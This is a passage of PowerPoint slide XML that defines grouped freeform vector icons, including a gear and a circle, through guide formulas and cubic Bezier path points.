                <a:gd name="T10" fmla="*/ 750 w 760"/>
                <a:gd name="T11" fmla="*/ 46 h 839"/>
                <a:gd name="T12" fmla="*/ 70 w 760"/>
                <a:gd name="T13" fmla="*/ 726 h 839"/>
                <a:gd name="T14" fmla="*/ 70 w 760"/>
                <a:gd name="T15" fmla="*/ 778 h 839"/>
                <a:gd name="T16" fmla="*/ 122 w 760"/>
                <a:gd name="T17" fmla="*/ 778 h 839"/>
                <a:gd name="T18" fmla="*/ 191 w 760"/>
                <a:gd name="T19" fmla="*/ 709 h 839"/>
                <a:gd name="T20" fmla="*/ 227 w 760"/>
                <a:gd name="T21" fmla="*/ 709 h 839"/>
                <a:gd name="T22" fmla="*/ 227 w 760"/>
                <a:gd name="T23" fmla="*/ 744 h 839"/>
                <a:gd name="T24" fmla="*/ 158 w 760"/>
                <a:gd name="T25" fmla="*/ 813 h 839"/>
                <a:gd name="T26" fmla="*/ 96 w 760"/>
                <a:gd name="T27" fmla="*/ 839 h 8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0" h="839">
                  <a:moveTo>
                    <a:pt x="96" y="839"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="839"/>
                    <a:pt x="51" y="830"/>
                    <a:pt x="34" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="779"/>
                    <a:pt x="0" y="724"/>
                    <a:pt x="34" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="10"/>
                    <a:pt x="714" y="10"/>
                    <a:pt x="714" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="0"/>
                    <a:pt x="740" y="0"/>
                    <a:pt x="750" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="760" y="20"/>
                    <a:pt x="760" y="36"/>
                    <a:pt x="750" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="726"/>
                    <a:pt x="70" y="726"/>
                    <a:pt x="70" y="726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="740"/>
                    <a:pt x="56" y="763"/>
                    <a:pt x="70" y="778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="792"/>
                    <a:pt x="108" y="792"/>
                    <a:pt x="122" y="778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="709"/>
                    <a:pt x="191" y="709"/>
                    <a:pt x="191" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="699"/>
                    <a:pt x="217" y="699"/>
                    <a:pt x="227" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="718"/>
                    <a:pt x="236" y="734"/>
                    <a:pt x="227" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="813"/>
                    <a:pt x="158" y="813"/>
                    <a:pt x="158" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="830"/>
                    <a:pt x="118" y="839"/>
                    <a:pt x="96" y="8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87" name="Freeform 291">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59AA2F7D-44D7-674D-80FB-326EBCA4B3A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8515989" y="3406003"/>
              <a:ext cx="60123" cy="59252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 260"/>
                <a:gd name="T1" fmla="*/ 259 h 259"/>
                <a:gd name="T2" fmla="*/ 43 w 260"/>
                <a:gd name="T3" fmla="*/ 216 h 259"/>
                <a:gd name="T4" fmla="*/ 0 w 260"/>
                <a:gd name="T5" fmla="*/ 113 h 259"/>
                <a:gd name="T6" fmla="*/ 43 w 260"/>
                <a:gd name="T7" fmla="*/ 10 h 259"/>
                <a:gd name="T8" fmla="*/ 79 w 260"/>
                <a:gd name="T9" fmla="*/ 10 h 259"/>
                <a:gd name="T10" fmla="*/ 79 w 260"/>
                <a:gd name="T11" fmla="*/ 45 h 259"/>
                <a:gd name="T12" fmla="*/ 51 w 260"/>
                <a:gd name="T13" fmla="*/ 113 h 259"/>
                <a:gd name="T14" fmla="*/ 79 w 260"/>
                <a:gd name="T15" fmla="*/ 181 h 259"/>
                <a:gd name="T16" fmla="*/ 214 w 260"/>
                <a:gd name="T17" fmla="*/ 181 h 259"/>
                <a:gd name="T18" fmla="*/ 250 w 260"/>
                <a:gd name="T19" fmla="*/ 181 h 259"/>
                <a:gd name="T20" fmla="*/ 250 w 260"/>
                <a:gd name="T21" fmla="*/ 216 h 259"/>
                <a:gd name="T22" fmla="*/ 147 w 260"/>
                <a:gd name="T23"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0" h="259">
                  <a:moveTo>
                    <a:pt x="147" y="259"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="259"/>
                    <a:pt x="71" y="244"/>
                    <a:pt x="43" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="189"/>
                    <a:pt x="0" y="152"/>
                    <a:pt x="0" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="74"/>
                    <a:pt x="16" y="37"/>
                    <a:pt x="43" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="0"/>
                    <a:pt x="69" y="0"/>
                    <a:pt x="79" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="20"/>
                    <a:pt x="89" y="36"/>
                    <a:pt x="79" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="63"/>
                    <a:pt x="51" y="87"/>
                    <a:pt x="51" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="139"/>
                    <a:pt x="61" y="162"/>
                    <a:pt x="79" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="217"/>
                    <a:pt x="178" y="217"/>
                    <a:pt x="214" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="171"/>
                    <a:pt x="240" y="171"/>
                    <a:pt x="250" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="190"/>
                    <a:pt x="260" y="206"/>
                    <a:pt x="250" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="244"/>
                    <a:pt x="186" y="259"/>
                    <a:pt x="14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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="188" name="Group 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384BC16A-77C8-714A-8503-A7C3ED8A484B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8413698" y="5183899"/>
            <a:ext cx="399948" cy="399077"/>
            <a:chOff x="22142450" y="155575"/>
            <a:chExt cx="728663" cy="727076"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Freeform 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C4C9CF-B5C9-C84D-8DFC-D8DF715675F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22448838" y="460375"/>
              <a:ext cx="115888" cy="115888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 139 w 278"/>
                <a:gd name="T1" fmla="*/ 278 h 278"/>
                <a:gd name="T2" fmla="*/ 0 w 278"/>
                <a:gd name="T3" fmla="*/ 139 h 278"/>
                <a:gd name="T4" fmla="*/ 139 w 278"/>
                <a:gd name="T5" fmla="*/ 0 h 278"/>
                <a:gd name="T6" fmla="*/ 278 w 278"/>
                <a:gd name="T7" fmla="*/ 139 h 278"/>
                <a:gd name="T8" fmla="*/ 139 w 278"/>
                <a:gd name="T9" fmla="*/ 278 h 278"/>
                <a:gd name="T10" fmla="*/ 139 w 278"/>
                <a:gd name="T11" fmla="*/ 51 h 278"/>
                <a:gd name="T12" fmla="*/ 51 w 278"/>
                <a:gd name="T13" fmla="*/ 139 h 278"/>
                <a:gd name="T14" fmla="*/ 139 w 278"/>
                <a:gd name="T15" fmla="*/ 228 h 278"/>
                <a:gd name="T16" fmla="*/ 227 w 278"/>
                <a:gd name="T17" fmla="*/ 139 h 278"/>
                <a:gd name="T18" fmla="*/ 139 w 278"/>
                <a:gd name="T19" fmla="*/ 5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 h="278">
                  <a:moveTo>
                    <a:pt x="139" y="278"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="278"/>
                    <a:pt x="0" y="216"/>
                    <a:pt x="0" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="63"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="139" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="0"/>
                    <a:pt x="278" y="63"/>
                    <a:pt x="278" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="216"/>
                    <a:pt x="215" y="278"/>
                    <a:pt x="139" y="278"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="139" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="51"/>
                    <a:pt x="51" y="91"/>
                    <a:pt x="51" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="188"/>
                    <a:pt x="90" y="228"/>
                    <a:pt x="139" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="228"/>
                    <a:pt x="227" y="188"/>
                    <a:pt x="227" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="91"/>
                    <a:pt x="188" y="51"/>
                    <a:pt x="139"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90" name="Freeform 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122D6DEE-E4BF-5C42-B71C-DD5E49E12550}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22339300" y="352425"/>
              <a:ext cx="334963" cy="333375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 310 w 797"/>
                <a:gd name="T1" fmla="*/ 744 h 797"/>
                <a:gd name="T2" fmla="*/ 235 w 797"/>
                <a:gd name="T3" fmla="*/ 690 h 797"/>
                <a:gd name="T4" fmla="*/ 142 w 797"/>
                <a:gd name="T5" fmla="*/ 704 h 797"/>
                <a:gd name="T6" fmla="*/ 106 w 797"/>
                <a:gd name="T7" fmla="*/ 564 h 797"/>
                <a:gd name="T8" fmla="*/ 74 w 797"/>
                <a:gd name="T9" fmla="*/ 487 h 797"/>
                <a:gd name="T10" fmla="*/ 0 w 797"/>
                <a:gd name="T11" fmla="*/ 363 h 797"/>
                <a:gd name="T12" fmla="*/ 77 w 797"/>
                <a:gd name="T13" fmla="*/ 307 h 797"/>
                <a:gd name="T14" fmla="*/ 92 w 797"/>
                <a:gd name="T15" fmla="*/ 216 h 797"/>
                <a:gd name="T16" fmla="*/ 217 w 797"/>
                <a:gd name="T17" fmla="*/ 90 h 797"/>
                <a:gd name="T18" fmla="*/ 197 w 797"/>
                <a:gd name="T19" fmla="*/ 142 h 797"/>
                <a:gd name="T20" fmla="*/ 178 w 797"/>
                <a:gd name="T21" fmla="*/ 126 h 797"/>
                <a:gd name="T22" fmla="*/ 143 w 797"/>
                <a:gd name="T23" fmla="*/ 195 h 797"/>
                <a:gd name="T24" fmla="*/ 74 w 797"/>
                <a:gd name="T25" fmla="*/ 360 h 797"/>
                <a:gd name="T26" fmla="*/ 51 w 797"/>
                <a:gd name="T27" fmla="*/ 434 h 797"/>
                <a:gd name="T28" fmla="*/ 125 w 797"/>
                <a:gd name="T29" fmla="*/ 476 h 797"/>
                <a:gd name="T30" fmla="*/ 128 w 797"/>
                <a:gd name="T31" fmla="*/ 615 h 797"/>
                <a:gd name="T32" fmla="*/ 181 w 797"/>
                <a:gd name="T33" fmla="*/ 668 h 797"/>
                <a:gd name="T34" fmla="*/ 260 w 797"/>
                <a:gd name="T35" fmla="*/ 646 h 797"/>
                <a:gd name="T36" fmla="*/ 361 w 797"/>
                <a:gd name="T37" fmla="*/ 744 h 797"/>
                <a:gd name="T38" fmla="*/ 437 w 797"/>
                <a:gd name="T39" fmla="*/ 744 h 797"/>
                <a:gd name="T40" fmla="*/ 537 w 797"/>
                <a:gd name="T41" fmla="*/ 646 h 797"/>
                <a:gd name="T42" fmla="*/ 620 w 797"/>
                <a:gd name="T43" fmla="*/ 668 h 797"/>
                <a:gd name="T44" fmla="*/ 670 w 797"/>
                <a:gd name="T45" fmla="*/ 615 h 797"/>
                <a:gd name="T46" fmla="*/ 672 w 797"/>
                <a:gd name="T47" fmla="*/ 476 h 797"/>
                <a:gd name="T48" fmla="*/ 747 w 797"/>
                <a:gd name="T49" fmla="*/ 434 h 797"/>
                <a:gd name="T50" fmla="*/ 724 w 797"/>
                <a:gd name="T51" fmla="*/ 360 h 797"/>
                <a:gd name="T52" fmla="*/ 655 w 797"/>
                <a:gd name="T53" fmla="*/ 195 h 797"/>
                <a:gd name="T54" fmla="*/ 620 w 797"/>
                <a:gd name="T55" fmla="*/ 126 h 797"/>
                <a:gd name="T56" fmla="*/ 536 w 797"/>
                <a:gd name="T57" fmla="*/ 150 h 797"/>
                <a:gd name="T58" fmla="*/ 437 w 797"/>
                <a:gd name="T59" fmla="*/ 53 h 797"/>
                <a:gd name="T60" fmla="*/ 361 w 797"/>
                <a:gd name="T61" fmla="*/ 53 h 797"/>
                <a:gd name="T62" fmla="*/ 290 w 797"/>
                <a:gd name="T63" fmla="*/ 107 h 797"/>
                <a:gd name="T64" fmla="*/ 310 w 797"/>
                <a:gd name="T65" fmla="*/ 53 h 797"/>
                <a:gd name="T66" fmla="*/ 488 w 797"/>
                <a:gd name="T67" fmla="*/ 53 h 797"/>
                <a:gd name="T68" fmla="*/ 561 w 797"/>
                <a:gd name="T69" fmla="*/ 106 h 797"/>
                <a:gd name="T70" fmla="*/ 656 w 797"/>
                <a:gd name="T71" fmla="*/ 90 h 797"/>
                <a:gd name="T72" fmla="*/ 706 w 797"/>
                <a:gd name="T73" fmla="*/ 216 h 797"/>
                <a:gd name="T74" fmla="*/ 721 w 797"/>
                <a:gd name="T75" fmla="*/ 307 h 797"/>
                <a:gd name="T76" fmla="*/ 797 w 797"/>
                <a:gd name="T77" fmla="*/ 363 h 797"/>
                <a:gd name="T78" fmla="*/ 724 w 797"/>
                <a:gd name="T79" fmla="*/ 487 h 797"/>
                <a:gd name="T80" fmla="*/ 691 w 797"/>
                <a:gd name="T81" fmla="*/ 564 h 797"/>
                <a:gd name="T82" fmla="*/ 706 w 797"/>
                <a:gd name="T83" fmla="*/ 654 h 797"/>
                <a:gd name="T84" fmla="*/ 566 w 797"/>
                <a:gd name="T85" fmla="*/ 690 h 797"/>
                <a:gd name="T86" fmla="*/ 488 w 797"/>
                <a:gd name="T87" fmla="*/ 72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97" h="797">
                  <a:moveTo>
                    <a:pt x="434" y="797"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="797"/>
                    <a:pt x="363" y="797"/>
                    <a:pt x="363" y="797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="797"/>
                    <a:pt x="310" y="773"/>
                    <a:pt x="310" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="723"/>
                    <a:pt x="310" y="723"/>
                    <a:pt x="310" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="722"/>
                    <a:pt x="309" y="721"/>
                    <a:pt x="307" y="721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="714"/>
                    <a:pt x="258" y="703"/>
                    <a:pt x="235" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="689"/>
                    <a:pt x="232" y="689"/>
                    <a:pt x="231" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="704"/>
                    <a:pt x="217" y="704"/>
                    <a:pt x="217" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="724"/>
                    <a:pt x="162" y="724"/>
                    <a:pt x="142" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="654"/>
                    <a:pt x="92" y="654"/>
                    <a:pt x="92" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="633"/>
                    <a:pt x="71" y="599"/>
                    <a:pt x="92" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="564"/>
                    <a:pt x="106" y="564"/>
                    <a:pt x="106" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="563"/>
                    <a:pt x="107" y="562"/>
                    <a:pt x="106" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="538"/>
                    <a:pt x="84" y="514"/>
                    <a:pt x="77" y="490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="488"/>
                    <a:pt x="75" y="487"/>
                    <a:pt x="74" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="487"/>
                    <a:pt x="53" y="487"/>
                    <a:pt x="53" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="487"/>
                    <a:pt x="0" y="463"/>
                    <a:pt x="0" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="363"/>
                    <a:pt x="0" y="363"/>
                    <a:pt x="0" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="334"/>
                    <a:pt x="24" y="310"/>
                    <a:pt x="53" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="310"/>
                    <a:pt x="74" y="310"/>
                    <a:pt x="74" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="310"/>
                    <a:pt x="76" y="308"/>
                    <a:pt x="77" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="282"/>
                    <a:pt x="94" y="258"/>
                    <a:pt x="107" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="234"/>
                    <a:pt x="108" y="232"/>
                    <a:pt x="107" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="216"/>
                    <a:pt x="92" y="216"/>
                    <a:pt x="92" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="195"/>
                    <a:pt x="71" y="161"/>
                    <a:pt x="92" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="90"/>
                    <a:pt x="142" y="90"/>
                    <a:pt x="142" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="70"/>
                    <a:pt x="197" y="70"/>
                    <a:pt x="217" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="106"/>
                    <a:pt x="233" y="106"/>
                    <a:pt x="233" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="116"/>
                    <a:pt x="243" y="132"/>
                    <a:pt x="233" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="152"/>
                    <a:pt x="207" y="152"/>
                    <a:pt x="197" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="126"/>
                    <a:pt x="182" y="126"/>
                    <a:pt x="182" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="126"/>
                    <a:pt x="179" y="126"/>
                    <a:pt x="178" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="126"/>
                    <a:pt x="178" y="126"/>
                    <a:pt x="178" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="176"/>
                    <a:pt x="128" y="176"/>
                    <a:pt x="128" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="177"/>
                    <a:pt x="127" y="179"/>
                    <a:pt x="128" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="195"/>
                    <a:pt x="143" y="195"/>
                    <a:pt x="143" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="212"/>
                    <a:pt x="163" y="239"/>
                    <a:pt x="151" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="280"/>
                    <a:pt x="131" y="300"/>
                    <a:pt x="125" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="345"/>
                    <a:pt x="98" y="360"/>
                    <a:pt x="74" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="360"/>
                    <a:pt x="53" y="360"/>
                    <a:pt x="53" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="360"/>
                    <a:pt x="51" y="361"/>
                    <a:pt x="51" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="434"/>
                    <a:pt x="51" y="434"/>
                    <a:pt x="51" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="435"/>
                    <a:pt x="52" y="436"/>
                    <a:pt x="53" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="436"/>
                    <a:pt x="74" y="436"/>
                    <a:pt x="74" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="436"/>
                    <a:pt x="119" y="452"/>
                    <a:pt x="125" y="476"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="496"/>
                    <a:pt x="140" y="516"/>
                    <a:pt x="151" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="557"/>
                    <a:pt x="159" y="583"/>
                    <a:pt x="142" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="615"/>
                    <a:pt x="128" y="615"/>
                    <a:pt x="128" y="615"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="616"/>
                    <a:pt x="127" y="617"/>
                    <a:pt x="128" y="618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="668"/>
                    <a:pt x="178" y="668"/>
                    <a:pt x="178" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="668"/>
                    <a:pt x="180" y="668"/>
                    <a:pt x="181" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="668"/>
                    <a:pt x="182" y="668"/>
                    <a:pt x="182" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="654"/>
                    <a:pt x="196" y="654"/>
                    <a:pt x="196" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="637"/>
                    <a:pt x="239" y="634"/>
                    <a:pt x="260" y="646"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="657"/>
                    <a:pt x="301" y="666"/>
                    <a:pt x="321" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="679"/>
                    <a:pt x="361" y="700"/>
                    <a:pt x="361" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="744"/>
                    <a:pt x="361" y="744"/>
                    <a:pt x="361" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="745"/>
                    <a:pt x="362" y="746"/>
                    <a:pt x="363" y="746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="746"/>
                    <a:pt x="434" y="746"/>
                    <a:pt x="434" y="746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="436" y="746"/>
                    <a:pt x="437" y="745"/>
                    <a:pt x="437" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="723"/>
                    <a:pt x="437" y="723"/>
                    <a:pt x="437" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="700"/>
                    <a:pt x="453" y="679"/>
                    <a:pt x="476" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="666"/>
                    <a:pt x="518" y="657"/>
                    <a:pt x="537" y="646"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="559" y="634"/>
                    <a:pt x="585" y="637"/>
                    <a:pt x="602" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="668"/>
                    <a:pt x="616" y="668"/>
                    <a:pt x="616" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="668"/>
                    <a:pt x="619" y="668"/>
                    <a:pt x="620" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="668"/>
                    <a:pt x="620" y="668"/>
                    <a:pt x="620" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="618"/>
                    <a:pt x="670" y="618"/>
                    <a:pt x="670" y="618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="618"/>
                    <a:pt x="670" y="615"/>
                    <a:pt x="670" y="615"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="655" y="600"/>
                    <a:pt x="655" y="600"/>
                    <a:pt x="655" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="639" y="583"/>
                    <a:pt x="635" y="557"/>
                    <a:pt x="647" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="658" y="516"/>
                    <a:pt x="667" y="496"/>
                    <a:pt x="672" y="476"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="679" y="452"/>
                    <a:pt x="700" y="436"/>
                    <a:pt x="724" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="744" y="436"/>
                    <a:pt x="744" y="436"/>
                    <a:pt x="744" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="746" y="436"/>
                    <a:pt x="747" y="435"/>
                    <a:pt x="747" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="747" y="363"/>
                    <a:pt x="747" y="363"/>
                    <a:pt x="747" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="747" y="361"/>
                    <a:pt x="746" y="360"/>
                    <a:pt x="744" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="360"/>
                    <a:pt x="724" y="360"/>
                    <a:pt x="724" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="700" y="360"/>
                    <a:pt x="679" y="345"/>
                    <a:pt x="672" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="666" y="300"/>
                    <a:pt x="658" y="280"/>
                    <a:pt x="646" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="634" y="239"/>
                    <a:pt x="638" y="212"/>
